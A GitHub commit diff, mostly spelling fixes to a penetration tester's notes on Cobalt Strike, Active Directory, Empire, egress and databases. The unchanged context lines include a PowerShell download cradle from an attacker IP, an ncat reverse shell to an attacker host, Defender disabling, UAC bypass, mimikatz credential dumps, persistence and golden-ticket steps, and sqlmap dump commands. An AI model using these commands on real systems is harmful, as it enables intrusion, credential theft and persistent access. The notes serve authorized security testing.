Skip to content

Commit

Permalink
Add Linux and AD notes, spellcheck.
Browse files Browse the repository at this point in the history
  • Loading branch information
@leebaird
leebaird committed Feb 28, 2022
1 parent 0634bc7 commit 599ea20
Show file tree
Hide file tree
Showing 16 changed files with 168 additions and 131 deletions.
9 changes: 5 additions & 4 deletions notes/Cobalt-Strike.txt
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
Cobalt Strike


Use the following install location: /opt/cobaltstrike/
This will allow you to get third-party apps installed when running /opt/discover/update.sh

Expand All @@ -12,7 +13,7 @@ Remove old data and Beacons (optional)
rm -rf data/

Start the team server
There are 2 mandotory parameters and 2 optional parameters. The first 2 parameters are required.
There are 2 mandatory parameters and 2 optional parameters. The first 2 parameters are required.
./teamserver <IP> <password> [Malleable C2 profile] [kill date for Beacons yyyy-mm-dd]

./teamserver 192.168.1.5 password malleable-c2-profiles/APT/etumbot.profile 2021-12-31
Expand All @@ -31,7 +32,7 @@ Start the team server
User: <your name>
Password: <password you entered from above>
Connect
VerifyFingerprint (SHA256 hash from above) > Yes
Verify Fingerprint (SHA256 hash from above) > Yes

- Remote connection
OPSEC: Never allow a client to make direct connections to your team server. Always use SSH and locally forward the connection.
Expand Down Expand Up @@ -104,7 +105,7 @@ Save > OK

OPSEC: Staged payloads are typically less secure.
Always prefer a fully staged or stageless payload and disable payload staging.
When you see (S) in the framwork, it refers to a stageless payload.
When you see (S) in the framework, it refers to a stageless payload.

Disable Windows Defender on your target Windows VM.
Enterprise: Windows Security > Virus & threat protection > Manage settings > turn off Real-time protection > Yes
Expand Down Expand Up @@ -197,7 +198,7 @@ ctrl+k will clear the current window.

# Commands

run Execute a shel command via cmd.exe
run Execute a shell command via cmd.exe
powerpick Execute PowerShell via Unmanaged PowerShell
psinject Inject Unmanaged PowerShell into a process
powershell-inport Import a PowerShell script
Expand Down
18 changes: 12 additions & 6 deletions notes/active-directory.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -48,14 +48,14 @@ Login with username and password: neo4j
Set a new password.

cd /opt/BloodHound-v4/Collectors/
python -m SimpleHTTPServer
python3 -m http.server

- Windows
cd to a discrete, writable directory (C:\Users\<user>\Desktop)
powershell -nop -exec bypass "IEX (New-Object Net.Webclient).DownloadFile('http://192.168.1.5:8000/SharpHound.exe', 'SharpHound.exe')"

SharpHound.exe -c LoggedOn Run the following as a user that has admin rights
SharpHound.exe -c Session On subseqequent runs just collect session data
SharpHound.exe -c Session On subsequent runs just collect session data

This will generate a zip file
Upload the file to Kali
Expand Down Expand Up @@ -107,18 +107,24 @@ Search xml files for cpassword.
GetDecryptedCpassword 'AES 256-bit encrypted password'
------------------------------------------------------------------------------------------------------------------------------------------------------

# Key terms

- Kerberos
The default authentication mechanism in Active Directory. It uses ticket-based authentication. A Key Distribution Center (KDC) grants a
Ticket-Granting Ticket (TGT) to a user who requests access to a service or an account. This ticket can be redeemed to generate a service ticket (ST)
Ticket Granting Ticket (TGT) to a user who requests access to a service or an account. This ticket can be redeemed to generate a service ticket (ST)
to access a particular service.

A user starts the communication process for a service request to a server with the service they want to access.
Every DC runs a Kerberos Distribution Center (KDC) service that processes all requests for Kerberos tickets.
The KBRTGT account acts as a service account for the KDC.
It contains three parts: Database, Authentication Server (AS), and Ticket Granting Server (TGS).
The AS verifies client authentication. If the logged user is authenticated successfully the AS issues a ticket called TGT.
Ticket Granting Ticket (TGT) confirms to other servers that user has been authenticated.
Ticket Granting Server (TGS): User request for TGS from the KDC that will be used to access the service of the application server.

- Ticket Granting Server (TGS)

- Service Principal Name (SPN)
A unique name for a service account that is used by Kerberos to associate a service instance with service logon account. This allows a client
application to request that the service authticate an account even if the client does not have the account name.
application to request that the service authenticate an account even if the client does not have the account name.

- Kerberoasting
Request the TGS ticket, which has the password hash of the SPN account, then crack it offline.
Expand Down
17 changes: 12 additions & 5 deletions notes/bash.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -30,8 +30,8 @@ wc -l Count the number o
wc -m Count the number of characters

comm file1 file2 file1, file2, shared by both files
comm -<123> file1 file2 Used to supress columns
comm -12 file1 file2 Supress columns 1 and 2
comm -<123> file1 file2 Used to suppress columns
comm -12 file1 file2 Suppress columns 1 and 2
diff -<c or u> file1 file2
vimdiff file1 file2
------------------------------------------------------------------------------------------------------------------------------------------------------
Expand All @@ -44,7 +44,7 @@ column -t Align columns
sed /^$/d Compress blank lines
paste -s -d" " Convert a list into a single line

apt-get install xml-twig-tools
apt install xml-twig-tools
xml_grep ‘firstName' file.xml --text_only Extract data from XML element

grep -oe '[a-zA-Z0-9._]\+@[a-zA-Z]\+.[a-zA-Z]\+' Find emails
Expand Down Expand Up @@ -74,7 +74,7 @@ awk '/FOO/ { FOO = 1; next } FOO == 1 && /^$/ { FOO = 0; next } { FOO = 0 } {
awk -v n=-2 'NR==n+1 {if($0 ~ /BAR/) { next; } else { print hold } } /FOO/ {n=NR;hold=$0;next}1'
Find FOO, if the next line contains BAR, delete both lines

sed 's/.* //' Find lines that contin a space and print from the space to the end of the line
sed 's/.* //' Find lines that contain a space and print from the space to the end of the line
grep -E 'FOO|BAR' Find lines that contain FOO or BAR
grep '[0-9]' Find lines that contain a number
grep '[0-9]$' Find lines that end with a number
Expand Down Expand Up @@ -155,6 +155,13 @@ tr '[A-Z]' '[a-z]' Translate upper ca
sed "s/$FOO./$FOO/g" Variables - use double quotes with sed or grep
------------------------------------------------------------------------------------------------------------------------------------------------------

# String together commands

semicolon (;) Does not depend on the first command completing with no errors
double ampersand (&&) Depends on the first command completing with no errors
pipe (|) Uses output from the first command as input to the second command
------------------------------------------------------------------------------------------------------------------------------------------------------

# Check for argument. If not given, print the usage
if [ -z "$1" ]; then
echo "Usage: $0 <domain name>"
Expand Down Expand Up @@ -203,7 +210,7 @@ else
echo
fi

# Validate input is a number and greather than 0
# Validate input is a number and greater than 0
if ! [[ $number =~ ^[0-9]+$ ]] || [[ $number -le 0 ]]; then
f_error
fi
Expand Down
2 changes: 1 addition & 1 deletion notes/consulting.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ Consulting
4 port switch
25’ CAT6 cable
(2) 6’ CAT6 cables
(2) Thunderbolt to Ethernet adaptors
(2) Thunderbolt to Ethernet adapters

# Dress
No hats.
Expand Down
4 changes: 2 additions & 2 deletions notes/databases.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -147,7 +147,7 @@ Login > Profile > flag
1. Locate a system running Oracle.
2. Determine Oracle version.
3. Determine Oracle SID.
4. Guess/Bruteforce USERNAME/PASS.
4. Guess/Brute force USERNAME/PASS.
5. Privilege escalation via SQL injection.
6. Manipulate data/post exploitation.
7. Cover tracks.
Expand Down Expand Up @@ -264,7 +264,7 @@ admin’;--

# sqlmap

Capture a longin with Burp and save to req.txt
Capture a login with Burp and save to req.txt

sqlmap -r req.txt --level=5 --risk=3
sqlmap -u "http://target/index.html?page=1" --dbs --dump --batch Show all dbs
Expand Down
18 changes: 9 additions & 9 deletions notes/egress.txt
View file
Original file line number Diff line number Diff line change
@@ -1,21 +1,21 @@
Egress


target - Ubuntu 10.0.0.10
target2 - Windows 10.0.0.11
attacker 10.0.0.5
target - Ubuntu 10.0.0.10
target2 - Windows 10.0.0.11
attacker 10.0.0.5

# netcat
target nc 10.0.0.5 80
attacker nc -lvp 80
target nc 10.0.0.5 80
attacker nc -lvp 80

# ncat
target ncat 10.0.0.5 --ssl -e /bin/bash
attacker ncat -l 443 --ssl
target ncat 10.0.0.5 --ssl -e /bin/bash
attacker ncat -l 443 --ssl

# cryptcat
target cryptcat 10.0.0.5 80 -k password
attacker cryptcat -lvp 80 -k password
target cryptcat 10.0.0.5 80 -k password
attacker cryptcat -lvp 80 -k password

# Egress-Assess

Expand Down
78 changes: 39 additions & 39 deletions notes/empire.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,22 +3,22 @@ Empire

cd /opt/Empire
./empire
help Show main help menu
listeners Change to the listener menu
help Show listener commands
uselistener <tab 2x> Show the different types of listeners
uselistener http Select a listener
info Show info about the listener
help Show main help menu
listeners Change to the listener menu
help Show listener commands
uselistener <tab 2x> Show the different types of listeners
uselistener http Select a listener
info Show info about the listener
set Port 4443
execute Execute the listener
back You should see a new active listener
execute Execute the listener
back You should see a new active listener

launcher Show the format
launcher powershell http Creates a PowerShell one-liner
launcher Show the format
launcher powershell http Creates a PowerShell one-liner
Copy all of the code.
Open a new Terminal.
cd /var/www/html
vim shell.bat Paste in the code
vim shell.bat Paste in the code
service apache2 start

- Windows
Expand All @@ -28,35 +28,35 @@ Open a Command Prompt, paste in the code, and press enter.

- Kali
In a few seconds, you will see the initial agent response.
main You should see 1 listener and 1 agent
agents Show active agents
rename <original name> <new name> Rename agent to something user friendly
rename <original name> initial Rename agent to something user friendly
interact initial Interact with the agent using new name
main You should see 1 listener and 1 agent
agents Show active agents
rename <original name> <new name> Rename agent to something user friendly
rename <original name> initial Rename agent to something user friendly
interact initial Interact with the agent using new name

usemodule powershell/privesc/bypassuac Select a module
info Show info about the module
run Default time is 5 sec
usemodule powershell/privesc/bypassuac Select a module
info Show info about the module
run Default time is 5 sec

info Look for high_integrity 0. This means we are not admin yet.
info Look for high_integrity 0. This means we are not admin yet.

usemodule powershell/privesc/powerup/allchecks
info
set Agent http Use the listeners name run
set Agent http Use the listeners name run

You should see a new listener.

back
list

One of the agents under Username should have an asterisk. This means power user.
One of the agents under Username should have an asterisk. This means power user

rename <name> <name2>
interact <name2>
Info Look for high_integrity 1, this means we are admin yet
creds Show cleartext passwords (empty)
mimikatz Wait a few
creds Show cleartext passwords
Info Look for high_integrity 1, this means we are admin yet
creds Show cleartext passwords (empty)
mimikatz Wait a few
creds Show cleartext passwords

usemodule persistence/elevated/schtasks
info
Expand All @@ -67,7 +67,7 @@ y
------------------------------------------------------------------------------------------------------------------------------------------------------

sysinfo
shell Get-Process Show running processes
shell Get-Process Show running processes
shell ipconfig
shell whoami

Expand All @@ -80,11 +80,11 @@ info
execute
------------------------------------------------------------------------------------------------------------------------------------------------------

kill <name> Kill agent
kill <name> Kill agent

usestager <tab 2x> Show the different types of stagers
usestager windows/launcher_bat Select a stager
info Show info about the stager
usestager <tab 2x> Show the different types of stagers
usestager windows/launcher_bat Select a stager
info Show info about the stager

usemodule powershell/privesc/powerup/allchecks
info
Expand All @@ -94,17 +94,17 @@ execute
back
bypassuac initial
y
agents Look for the *, which means a high integrity agent
interact <name*> Use name for the high integrity agent
agents Look for the *, which means a high integrity agent
interact <name*> Use name for the high integrity agent
rename PhishedHigh
ps See who else is on the box
psinject initial <PID> PID of other user's process
ps See who else is on the box
psinject initial <PID> PID of other user's process
info
execute

agents
list
interact <name**> Use name for the second user
interact <name**> Use name for the second user
usemodule situational_awareness/network/find_localadmin_access
info
execute
Expand All @@ -117,7 +117,7 @@ set Listener initial
execute

agents
interact <name***> Use name for the second user with the high integrity agent
interact <name***> Use name for the second user with the high integrity agent
rename DC
usemodule credentials/mimikatz/lsadump
info
Expand All @@ -126,15 +126,15 @@ execute
creds
agents
interact PhishedUser
dir \\PRIMARY\C$ Access denied
dir \\PRIMARY\C$ Access denied
usemodule credentials/mimikatz/golden_ticket
info
set CredID 1
set user Administrator
execute

back
dir \\PRIMARY\C$ Access granted
dir \\PRIMARY\C$ Access granted
------------------------------------------------------------------------------------------------------------------------------------------------------

Example 2
Expand Down
2 changes: 1 addition & 1 deletion notes/forensics.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ hdc  secondary master IDE 
hdd  secondary slave IDE
------------------------------------------------------------------------------------------------------------------------------------------------------

# SCSI, USB or SATA hard drive naming conventions 
# SCSI, USB, or SATA hard drive naming conventions 

sda  1st
sdb  2nd
Expand Down
6 changes: 5 additions & 1 deletion notes/kali.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -58,6 +58,10 @@ View
Editor
Tab width: 5
Tab mode: Insert Spaces
Window
Enable Client-side decorations
Plugins
Enable Spell Checking
Close > quit mousepad
------------------------------------------------------------------------------------------------------------------------------------------------------

Expand Down Expand Up @@ -122,7 +126,7 @@ service ssh start Start ssh
netstat -antp | grep ssh Verify the ssh service is running

service apache2 start Start Apache
xdg-open localhost Verify the Apache service is running
xdg-open localhost Verify the Apache service is running
/var/www/html/ Document root

update-rc.d <service> <enable|disable> Enable a service to start at boot time
Expand Down
Loading

0 comments on commit 599ea20

Please sign in to comment.